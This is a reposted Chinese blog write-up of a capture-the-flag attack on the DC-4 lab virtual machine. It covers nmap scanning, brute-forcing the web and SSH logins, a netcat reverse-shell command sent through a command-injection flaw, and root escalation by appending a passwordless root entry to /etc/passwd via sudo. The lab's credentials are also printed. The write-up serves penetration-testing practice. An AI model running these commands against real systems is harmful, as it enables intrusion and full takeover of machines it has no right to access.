IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 【记一次DC4靶场夺旗过程】 -> 正文阅读

[系统运维]【记一次DC4靶场夺旗过程】

目录

前言??

夺旗过程

总结


前言??

? ?最近也是学了一些提权方面的知识,所以找个靶场来练练手。以下针对vulnerable发布的dc4靶场来进行一个简单的渗透测试。将靶机下载好导入到VMware中。

? ?测试环境:dc4靶机:https://download.vulnhub.com/dc/DC-4.zip

夺旗过程

一、信息收集

? 由于靶机没有给出IP地址,所以我们需要使用信息收集去获取有用的信息。工具:nmap.?

┌──(root?kali)-[~]
└─# nmap -sT 192.168.175.0/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 21:57 CST
Nmap scan report for 192.168.175.130
Host is up (0.00095s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:72:64:D4 (VMware)

获取到了dc靶机的IP地址后,接着使用nmap获取到目标靶机的操作系统、开启的服务、端口、软件版本。

意外收获:发现了靶机开启了22号端口,ssh服务;80号端口,http服务;操作系统为Linux。

先尝试对web服务下手,看看这个靶机的网站的功能是什么。发现其主要是一个登录的界面:

二、获取dc网站用户登录信息

一般来说一个登录的界面给到你,可以尝试的攻击方式依次为:sql注入、暴力破解、xxe、越权、弱口令。使用sqlmap工具未检测出存在sql注入。xxe漏洞不存在,这个可以使用bp抓包,判断传输数据的格式不是xml。至于越权和弱口令,尝试后未判断出来存在漏洞。所以我们采用暴力破解这种最原始最暴力的方式来破解它的登录账号和密码。

工具:burpsuite +字典。

bp抓取用户登录该网站的数据包送至intruder模块,选择positions为:username 和password,攻击类型为cluster bomb。攻击的palyload为导入的字典。设置完成后点击开始攻击。

bp代理

设置repeater攻击参数

?成功爆破出靶场的网站的登录用户:admin ,密码:happy.

三、反弹shell

? 成功登录到网站傻上面后,测试出网站存在命令执行的漏洞。

? 所以,可以借此反弹shell.尝试使用bp抓包,获取到数据包后送至repeater中,先在kali中使用nc监听11111端口,然后在repeater模块中的数据包中写入反弹shell命令:nc 192.168.175.135? 11111 -e /bin/bash,点击send。(关于原生版本的nc安装方法参考:原生版本的netcat安装方法

反弹shell

kali监听11111端口反弹回来的shell,并执行了id命令回显当前用户的信息:可见这属于系统的一种服务,并不是管理员创建的用户。

四、查找信息

这好比你是一个小偷,你进入别人家的房子里面翻箱倒柜的查找有用的东西。现在我们已经拿到这个网站的shell了,但是,对整个的操作系统方面,我们还没有足够的权限去使唤管理员。所以,需要进行有用的信息查询。提供思路:目录(/home、/etc ......);这里我们查找/home目录下,

发现存在这三个用户:charles、jim、sam。再进入各自的家目录中搜寻有用的文件,发现/home/jim目录中存在着密码的备份文件old-passwords.bak,有密码备份文件和用户名(再/home中发现的),并且22号端口是开启的,那么我们可以尝试使用暴力破解远程登录。进而拿到一个root创建的用户,进而继续尝试后续提权操作。

kali工具hydra(九头蛇)暴力破解ssh登录。

创建字典:

?使用hydra成功爆破出一个可以登录ssh的用户信息,用户名:jim ,密码:?jibril04。

使用kali远程连接:

五、提权

查询当前用户能否满足sudo提权、suid提权、crontable提权、linux内核漏洞提权等

1. sudo提权:失败:

2. 查询可利用的suid提权:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

?搞了半天,原来被耍了,suid提权参考:https://gtfobins.github.io/

然并卵..............?

3. 所以去看看/var/mail的记录:发现有邮箱记录:

?用户:charles,,密码:^xHhA&hvim0y,,从邮箱的内容发现,charles的权限貌似要高一些;

使用charles用户登录系统

?尝试使用sudo提权:

?发现了一个/usr/bin/teehee的命令,但是在相关sudo提权网站上面查询了之后发现没有对应的提权命令,盲猜这个命令是一个别名。所以:

?大致知晓其作用是:将标准输入复制到每个FILE,也复制到标准输出。

所以可以尝试添加一个root权限的用户,使用标准输出修改/etc/passwd中的该用户信息,使得其无密码即可登录:

?输入命令:

charles@dc-4:~$ echo "haha::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd 

cat /etc/passwd:

?可以发现已经提权到root权限了。

总结

其实可以发现,我们从渗透整个网站来看,无非离不开的一个就是:信息收集。想想自己在渗透中的提权方面卡壳了很久,究其原因就是信息收集能力薄弱,所以还需加强这方面的练习

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-07-04 23:22:23  更:2022-07-04 23:24:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 12:05:53-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码